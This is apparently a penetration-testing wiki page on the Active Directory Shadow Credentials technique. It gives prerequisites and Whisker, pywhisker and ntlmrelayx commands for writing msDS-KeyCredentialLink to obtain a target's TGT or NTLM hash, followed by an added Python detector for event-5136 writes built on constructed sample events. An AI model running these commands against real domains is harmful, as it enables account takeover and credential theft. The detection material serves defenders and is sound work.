# Shadow Credentials

Before exploiting Shadow Credentials, I highly recommend reading the SpecterOps article on the technique (linked under References below).

## Prerequisites

There are three prerequisites for this attack to be performed:

- The ability to write to the `msDS-KeyCredentialLink` attribute on the target.
- AD CS must be configured.
- A DC on the domain must be configured to support PKINIT.

## Exploitation

After identifying a user account or machine account whose `msDS-KeyCredentialLink` attribute can be written to, Whisker can be used to automate most of the exploitation from a Windows machine:

```
# Generic usage of Whisker
Whisker.exe add /target:parzival

## https://github.com/ShutdownRepo/pywhisker
# Generic usage of PyWhisker
pywhisker.py -d $domain -u $user -p $password --target $target --action "list"
```

After Whisker runs, it prints a Rubeus command that can be executed to obtain the target's TGT or NTLM hash.

## Relaying

Impacket's ntlmrelayx also supports exploiting shadow credentials and can be used as follows:

```
# Relaying will work against either LDAP or LDAPS

# LDAPS
ntlmrelayx -t ldaps://parz-dc1 --shadow-credentials --shadow-target 'parz-dc2'

# LDAP
ntlmrelayx -t ldap://parz-dc1 --shadow-credentials --shadow-target 'parz-dc2'

## If --shadow-target is omitted, ntlmrelayx attempts to obtain a hash for the relayed user itself.
ntlmrelayx -t ldap://parz-dc1 --shadow-credentials
```
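Every technique on this page (Whisker, pywhisker and `ntlmrelayx --shadow-credentials`) has to write to `msDS-KeyCredentialLink`, so that write is the natural detection point. As an added defensive example that is not part of the original page or of any of those tools, the following Python parses Windows Security event 5136 ("A directory service object was modified") records exported as XML and flags additions to `msDS-KeyCredentialLink` made by a principal other than the object itself or an allowlisted provisioning account. It assumes "Audit Directory Service Changes" is enabled and a SACL on the account objects covers writes to that attribute; the sample events, the `svc_dirsync` allowlist entry and the account names other than `parzival` and `parz-dc2` are constructed for the example.

```python
"""Flag msDS-KeyCredentialLink writes in Windows Security event 5136 XML records."""
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Namespace used by Windows event XML (Event Viewer "Details > XML View").
NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Event 5136 reports the operation as a resource-string id.
OP_TYPES = {"%%14674": "added", "%%14675": "deleted"}

# Hypothetical allowlist of principals expected to populate the attribute
# (e.g. a directory-sync service account). Placeholder, not from the page.
ALLOWLISTED_WRITERS = {"svc_dirsync"}

TARGET_ATTRIBUTE = "msds-keycredentiallink"


@dataclass
class KeyCredentialWrite:
    record_id: str
    subject: str
    object_dn: str
    operation: str
    suspicious: bool


def _data(event, name):
    """Return the <Data Name="..."> value from the event's EventData, or ''."""
    node = event.find(f"e:EventData/e:Data[@Name='{name}']", NS)
    return (node.text or "").strip() if node is not None else ""


def _rdn_value(dn):
    """First RDN value of a DN, e.g. 'parzival' from 'CN=parzival,CN=Users,...'."""
    first = dn.split(",", 1)[0]
    return first.split("=", 1)[1] if "=" in first else first


def parse_5136(xml_text):
    """Parse one event XML document; return a KeyCredentialWrite or None if irrelevant."""
    event = ET.fromstring(xml_text)
    if event.findtext("e:System/e:EventID", default="", namespaces=NS) != "5136":
        return None
    if _data(event, "AttributeLDAPDisplayName").lower() != TARGET_ATTRIBUTE:
        return None
    subject = _data(event, "SubjectUserName")
    object_dn = _data(event, "ObjectDN")
    operation = OP_TYPES.get(_data(event, "OperationType"), "unknown")
    # Heuristic (assumption): a key added by anyone other than the object itself
    # (Windows Hello for Business self-enrolment) or an allowlisted provisioning
    # account is worth triage. Trailing '$' is stripped so machine accounts compare.
    self_write = subject.rstrip("$").lower() == _rdn_value(object_dn).rstrip("$").lower()
    suspicious = operation == "added" and not self_write and subject not in ALLOWLISTED_WRITERS
    record_id = event.findtext("e:System/e:EventRecordID", default="", namespaces=NS)
    return KeyCredentialWrite(record_id, subject, object_dn, operation, suspicious)


def scan(events):
    """Return every msDS-KeyCredentialLink write found in an iterable of event XML strings."""
    hits = (parse_5136(x) for x in events)
    return [h for h in hits if h is not None]


def _event(record_id, subject, object_dn, attr, op):
    # Constructed 5136 record in the shape Event Viewer exports; not a real capture.
    return f"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>5136</EventID><EventRecordID>{record_id}</EventRecordID></System>
  <EventData>
    <Data Name="SubjectUserName">{subject}</Data>
    <Data Name="ObjectDN">{object_dn}</Data>
    <Data Name="AttributeLDAPDisplayName">{attr}</Data>
    <Data Name="OperationType">{op}</Data>
  </EventData>
</Event>"""


# Constructed sample: self-enrolment, sync-account write, third-party write to a DC
# account (the ntlmrelayx scenario above), and an unrelated attribute change.
SAMPLE_EVENTS = [
    _event("1001", "parzival", "CN=parzival,CN=Users,DC=parz,DC=local", "msDS-KeyCredentialLink", "%%14674"),
    _event("1002", "svc_dirsync", "CN=art3mis,CN=Users,DC=parz,DC=local", "msDS-KeyCredentialLink", "%%14674"),
    _event("1003", "aech", "CN=PARZ-DC2,OU=Domain Controllers,DC=parz,DC=local", "msDS-KeyCredentialLink", "%%14674"),
    _event("1004", "aech", "CN=art3mis,CN=Users,DC=parz,DC=local", "description", "%%14674"),
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        flag = "SUSPICIOUS" if hit.suspicious else "expected"
        print(f"[{flag}] record {hit.record_id}: {hit.subject} {hit.operation} key on {hit.object_dn}")
```

The third record is the case this page's relaying section produces: a key credential added to a domain controller's account by an unrelated user, which no normal enrolment flow does. Tune `ALLOWLISTED_WRITERS` to the accounts that legitimately provision keys in your environment, and keep the deletion events too, since a cleanup after use (e.g. `Whisker.exe remove`) is itself a signal.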

## References

{% embed url="https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials" %}

{% embed url="https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab" %}

{% embed url="https://pentestlab.blog/2022/02/07/shadow-credentials/" %}